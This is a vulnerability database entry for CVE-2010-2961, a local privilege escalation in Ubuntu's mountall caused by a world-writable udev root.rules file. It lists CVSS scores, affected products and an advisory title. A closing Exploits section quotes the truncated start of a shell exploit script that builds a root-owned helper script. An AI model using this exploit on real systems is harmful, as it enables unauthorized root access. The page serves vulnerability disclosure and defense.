6.9
CVSSv2

CVE-2010-2961

Published: 14/09/2010 Updated: 15/09/2010
CVSS v2 Base Score: 6.9 | Impact Score: 10 | Exploitability Score: 3.4
VMScore: 695
Vector: AV:L/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

mountall.c in mountall prior to 2.15.2 uses 0666 permissions for the root.rules file, which allows local users to gain privileges by modifying this file.

Vulnerable Product Search on Vulmon Subscribe to Product

scott james remnant mountall 1.0

scott james remnant mountall

Vendor Advisories

Local root escalation via writable udev rules ...

Exploits

# source: wwwsecurityfocuscom/bid/43084/info #!/bin/sh # by fuzz For Anux inc # # ubuntu 1004 , 1010 if [ -z "$1" ] then echo "usage: $0 <UDEV KERNEL EVENT>" echo "see here wwwreactivatednet/writing_udev_ruleshtml" exit fi cat > usn985-exploitsh << EOF #!/bin/sh chown root:root $PWD/us ...